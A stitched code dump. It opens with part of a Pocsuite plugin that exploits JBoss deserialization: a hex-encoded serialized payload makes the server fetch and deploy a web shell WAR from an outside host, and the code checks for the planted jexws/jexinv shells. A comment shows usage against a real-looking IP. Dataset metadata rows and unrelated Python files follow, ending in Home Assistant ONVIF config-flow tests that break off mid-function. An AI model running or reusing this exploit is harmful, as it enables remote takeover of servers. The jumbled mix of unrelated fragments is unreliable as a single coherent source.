r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexinv/jexinv.jsp")
def exploit_web_console_invoker(self,url):
"""
Exploits web console invoker
Does not work in JBoss 5 (bug in JBoss5)
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = (
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
"\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
"\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
"\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
"\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
"\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
"\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
"\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
"\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
"\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
"\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
"\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
"\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
"\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
"\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
"\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0e\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
"\x77\x73\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70\x70"
"\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x73"
"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74"
"\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf"
"\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f"
"\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexws/jexws.jsp")
def auto_exploit(self,url, exploit_type):
result = 505
if exploit_type == "jmx-console":
result = self.exploit_jmx_console_file_repository(url)
if result != 200 and result != 500:
result = self.exploit_jmx_console_main_deploy(url)
elif exploit_type == "web-console":
result = self.exploit_web_console_invoker(url)
elif exploit_type == "JMXInvokerServlet":
result = self.exploit_jmx_invoker_file_repository(url, 0)
if result != 200 and result != 500:
result = self.exploit_jmx_invoker_file_repository(url, 1)
if result == 200 or result == 500:
return True
def poc(self,url):
"""
Test if a GET to a URL is successful
:param url: The URL to test
:return: A dict with the exploit type as the keys, and the HTTP status code as the value
"""
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console": "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet"}
step1 = False
exploit_type = ''
for i in paths.keys():
try:
r = pool.request('HEAD', url + str(paths[i]), redirect=True, headers=headers, timeout=3)
paths[i] = r.status
if paths[i] == 200 or paths[i] == 500:
step1 = True
exploit_type = str(i)
else:
pass
except Exception:
paths[i] = 505
if step1:
step2 = False
try:
step2 = self.auto_exploit(url, exploit_type)
except Exception, e:
pass
return step2
else:
return False
#验证漏洞 pocsuite -r 13-JBoss-serialization-getshell.py -u 1.197.56.123:8087 --verify
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = "8087"
vul_host = _host + ":" + _port
#print vul_host
try:
vul_result = self.poc(vul_host)
except Exception, e:
vul_result = False
if vul_result:
#print u"发现漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = vul_host + "https://github.com/joaomatosf/jexboss"
#print r_content
#from bs4 import BeautifulSoup
#soup = BeautifulSoup(r_content,'html.parser')
#print soup.h1.string
print '[+]13 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
# https://github.com/joaomatosf/jexboss
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(JbossPOC)
| 57.054622
| 145
| 0.597356
| 4,894
| 27,158
| 3.293421
| 0.124234
| 0.012284
| 0.010609
| 0.014146
| 0.576374
| 0.515759
| 0.488026
| 0.464946
| 0.442238
| 0.410473
| 0
| 0.290177
| 0.210214
| 27,158
| 475
| 146
| 57.174737
| 0.46128
| 0.022903
| 0
| 0.153425
| 0
| 0.512329
| 0.623978
| 0.531239
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.010959
| 0.054795
| null | null | 0.00274
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
863265fec69e3c88b700b8a9630a14290000cba9
| 75
|
py
|
Python
|
Python/thread.py
|
santoshgawande/DS-Algorithms
|
eb1de229fd3336d862bd4787295f208a4424d0bb
|
[
"Apache-2.0"
] | null | null | null |
Python/thread.py
|
santoshgawande/DS-Algorithms
|
eb1de229fd3336d862bd4787295f208a4424d0bb
|
[
"Apache-2.0"
] | null | null | null |
Python/thread.py
|
santoshgawande/DS-Algorithms
|
eb1de229fd3336d862bd4787295f208a4424d0bb
|
[
"Apache-2.0"
] | null | null | null |
import _thread
print(dir(_thread))
import threading
print(dir(threading))
| 15
| 21
| 0.8
| 10
| 75
| 5.8
| 0.5
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 75
| 5
| 21
| 15
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
8661c5052bfef444aee5ba496e134425f6dd1677
| 143
|
py
|
Python
|
oembed/image_processors/__init__.py
|
EightMedia/djangoembed
|
ee325f7375c48405f9c3e7e2c0fa7f5a08fafd48
|
[
"MIT"
] | 8
|
2015-02-06T19:18:49.000Z
|
2021-01-01T05:46:02.000Z
|
oembed/image_processors/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | null | null | null |
oembed/image_processors/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | 5
|
2015-03-15T11:41:26.000Z
|
2018-03-08T09:45:26.000Z
|
from oembed.constants import OEMBED_IMAGE_PROCESSOR
from oembed.utils import load_class
image_processor = load_class(OEMBED_IMAGE_PROCESSOR)
| 23.833333
| 52
| 0.874126
| 20
| 143
| 5.9
| 0.45
| 0.355932
| 0.338983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 143
| 5
| 53
| 28.6
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8681a52bd070b65ed1fa8dafc44cd06a3c8b061f
| 73
|
py
|
Python
|
config/__init__.py
|
Neuralearn/PAN.pytorch
|
111a85f6d186d9043f82416e14644ebf19975b58
|
[
"Apache-2.0"
] | 419
|
2019-08-24T02:56:28.000Z
|
2022-03-27T17:46:26.000Z
|
config/__init__.py
|
Neuralearn/PAN.pytorch
|
111a85f6d186d9043f82416e14644ebf19975b58
|
[
"Apache-2.0"
] | 43
|
2019-08-25T15:46:14.000Z
|
2021-09-29T14:11:21.000Z
|
config/__init__.py
|
Neuralearn/PAN.pytorch
|
111a85f6d186d9043f82416e14644ebf19975b58
|
[
"Apache-2.0"
] | 126
|
2019-08-24T16:52:34.000Z
|
2021-09-20T21:44:40.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:50
# @Author : zhoujun
| 24.333333
| 28
| 0.520548
| 11
| 73
| 3.454545
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0.232877
| 73
| 3
| 29
| 24.333333
| 0.464286
| 0.917808
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
86a3d6625dfdfac0591f77bcbcdbf29113ac1e3e
| 46
|
py
|
Python
|
django_morepath/__init__.py
|
morepath/django-morepath
|
8f575684a032af1d1cfa97ba3e9e132096572e7e
|
[
"BSD-3-Clause"
] | 2
|
2020-01-16T16:00:59.000Z
|
2020-01-19T18:24:08.000Z
|
django_morepath/__init__.py
|
morepath/django-morepath
|
8f575684a032af1d1cfa97ba3e9e132096572e7e
|
[
"BSD-3-Clause"
] | null | null | null |
django_morepath/__init__.py
|
morepath/django-morepath
|
8f575684a032af1d1cfa97ba3e9e132096572e7e
|
[
"BSD-3-Clause"
] | null | null | null |
from .views import make_morepath_view # noqa
| 23
| 45
| 0.804348
| 7
| 46
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 46
| 1
| 46
| 46
| 0.897436
| 0.086957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
86c8b4e8e241ec091fca1e868b1636554866b891
| 160
|
py
|
Python
|
tests/conftest.py
|
unparalleled-js/ape-demo-erc20
|
d2bfb04497d64cef3096f92784ffeda2f4deb490
|
[
"MIT"
] | 1
|
2022-03-09T14:29:30.000Z
|
2022-03-09T14:29:30.000Z
|
tests/conftest.py
|
unparalleled-js/ape-demo-erc20
|
d2bfb04497d64cef3096f92784ffeda2f4deb490
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
unparalleled-js/ape-demo-erc20
|
d2bfb04497d64cef3096f92784ffeda2f4deb490
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.fixture
def owner(accounts):
return accounts[0]
@pytest.fixture
def token(owner, project):
return owner.deploy(project.Token)
| 13.333333
| 38
| 0.7375
| 21
| 160
| 5.619048
| 0.52381
| 0.220339
| 0.271186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007407
| 0.15625
| 160
| 11
| 39
| 14.545455
| 0.866667
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
d4a90ce81c6e8b67f84b1307b33ebc009055d1b3
| 19,143
|
py
|
Python
|
tests/components/onvif/test_config_flow.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 3
|
2020-11-27T06:26:27.000Z
|
2020-12-09T14:55:16.000Z
|
tests/components/onvif/test_config_flow.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 25
|
2021-10-02T10:01:14.000Z
|
2022-03-31T06:11:49.000Z
|
tests/components/onvif/test_config_flow.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 3
|
2022-01-02T18:49:54.000Z
|
2022-01-25T02:03:54.000Z
|
"""Test ONVIF config flow."""
from unittest.mock import MagicMock, patch
from onvif.exceptions import ONVIFError
from zeep.exceptions import Fault
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.onvif import config_flow
from . import (
HOST,
MAC,
NAME,
PASSWORD,
PORT,
SERIAL_NUMBER,
URN,
USERNAME,
setup_mock_device,
setup_mock_onvif_camera,
setup_onvif_integration,
)
DISCOVERY = [
{
"EPR": URN,
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
"MAC": MAC,
},
{
"EPR": "urn:uuid:987654321",
config_flow.CONF_NAME: "TestCamera2",
config_flow.CONF_HOST: "5.6.7.8",
config_flow.CONF_PORT: PORT,
"MAC": "ee:dd:cc:bb:aa",
},
]
def setup_mock_discovery(
mock_discovery, with_name=False, with_mac=False, two_devices=False
):
"""Prepare mock discovery result."""
services = []
for item in DISCOVERY:
service = MagicMock()
service.getXAddrs = MagicMock(
return_value=[
f"http://{item[config_flow.CONF_HOST]}:{item[config_flow.CONF_PORT]}/onvif/device_service"
]
)
service.getEPR = MagicMock(return_value=item["EPR"])
scopes = []
if with_name:
scope = MagicMock()
scope.getValue = MagicMock(
return_value=f"onvif://www.onvif.org/name/{item[config_flow.CONF_NAME]}"
)
scopes.append(scope)
if with_mac:
scope = MagicMock()
scope.getValue = MagicMock(
return_value=f"onvif://www.onvif.org/mac/{item['MAC']}"
)
scopes.append(scope)
service.getScopes = MagicMock(return_value=scopes)
services.append(service)
mock_discovery.return_value = services
async def test_flow_discovered_devices(hass):
"""Test that config flow works for discovered devices."""
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.config_flow.wsdiscovery"
) as mock_discovery, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device:
setup_mock_onvif_camera(mock_onvif_camera)
setup_mock_discovery(mock_discovery)
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={"auto": True}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "device"
assert len(result["data_schema"].schema[config_flow.CONF_HOST].container) == 3
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={config_flow.CONF_HOST: f"{URN} ({HOST})"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "configure"
with patch(
"homeassistant.components.onvif.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.onvif.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == f"{URN} - {MAC}"
assert result["data"] == {
config_flow.CONF_NAME: URN,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
}
async def test_flow_discovered_devices_ignore_configured_manual_input(hass):
"""Test that config flow discovery ignores configured devices."""
await setup_onvif_integration(hass)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.config_flow.wsdiscovery"
) as mock_discovery, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device:
setup_mock_onvif_camera(mock_onvif_camera)
setup_mock_discovery(mock_discovery, with_mac=True)
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={"auto": True}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "device"
assert len(result["data_schema"].schema[config_flow.CONF_HOST].container) == 2
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={config_flow.CONF_HOST: config_flow.CONF_MANUAL_INPUT},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "configure"
async def test_flow_discovered_no_device(hass):
"""Test that config flow discovery no device."""
await setup_onvif_integration(hass)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.config_flow.wsdiscovery"
) as mock_discovery, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device:
setup_mock_onvif_camera(mock_onvif_camera)
mock_discovery.return_value = []
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={"auto": True}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "configure"
async def test_flow_discovery_ignore_existing_and_abort(hass):
"""Test that config flow discovery ignores setup devices."""
await setup_onvif_integration(hass)
await setup_onvif_integration(
hass,
config={
config_flow.CONF_NAME: DISCOVERY[1]["EPR"],
config_flow.CONF_HOST: DISCOVERY[1][config_flow.CONF_HOST],
config_flow.CONF_PORT: DISCOVERY[1][config_flow.CONF_PORT],
config_flow.CONF_USERNAME: "",
config_flow.CONF_PASSWORD: "",
},
unique_id=DISCOVERY[1]["MAC"],
entry_id="2",
)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.config_flow.wsdiscovery"
) as mock_discovery, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device:
setup_mock_onvif_camera(mock_onvif_camera)
setup_mock_discovery(mock_discovery, with_name=True, with_mac=True)
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={"auto": True}
)
# It should skip to manual entry if the only devices are already configured
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "configure"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
# It should abort if already configured and entered manually
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
async def test_flow_manual_entry(hass):
"""Test that config flow works for discovered devices."""
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.config_flow.wsdiscovery"
) as mock_discovery, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device:
setup_mock_onvif_camera(mock_onvif_camera, two_profiles=True)
# no discovery
mock_discovery.return_value = []
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={"auto": False},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "configure"
with patch(
"homeassistant.components.onvif.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.onvif.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == f"{NAME} - {MAC}"
assert result["data"] == {
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
}
async def test_flow_import_not_implemented(hass):
"""Test that config flow uses Serial Number when no MAC available."""
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device, patch(
"homeassistant.components.onvif.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.onvif.async_setup_entry", return_value=True
) as mock_setup_entry:
setup_mock_onvif_camera(mock_onvif_camera, with_interfaces_not_implemented=True)
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == f"{NAME} - {SERIAL_NUMBER}"
assert result["data"] == {
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
}
async def test_flow_import_no_mac(hass):
"""Test that config flow uses Serial Number when no MAC available."""
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera, patch(
"homeassistant.components.onvif.ONVIFDevice"
) as mock_device, patch(
"homeassistant.components.onvif.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.onvif.async_setup_entry", return_value=True
) as mock_setup_entry:
setup_mock_onvif_camera(mock_onvif_camera, with_interfaces=False)
setup_mock_device(mock_device)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == f"{NAME} - {SERIAL_NUMBER}"
assert result["data"] == {
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
}
async def test_flow_import_no_mac_or_serial(hass):
"""Test that config flow fails when no MAC or Serial Number available."""
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera:
setup_mock_onvif_camera(
mock_onvif_camera, with_interfaces=False, with_serial=False
)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "no_mac"
async def test_flow_import_no_h264(hass):
"""Test that config flow fails when no MAC available."""
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera:
setup_mock_onvif_camera(mock_onvif_camera, with_h264=False)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "no_h264"
async def test_flow_import_onvif_api_error(hass):
"""Test that config flow fails when ONVIF API fails."""
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera:
setup_mock_onvif_camera(mock_onvif_camera)
mock_onvif_camera.create_devicemgmt_service = MagicMock(
side_effect=ONVIFError("Could not get device mgmt service")
)
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
config_flow.CONF_NAME: NAME,
config_flow.CONF_HOST: HOST,
config_flow.CONF_PORT: PORT,
config_flow.CONF_USERNAME: USERNAME,
config_flow.CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "onvif_error"
async def test_flow_import_onvif_auth_error(hass):
"""Test that config flow fails when ONVIF API fails."""
with patch(
"homeassistant.components.onvif.config_flow.get_device"
) as mock_onvif_camera:
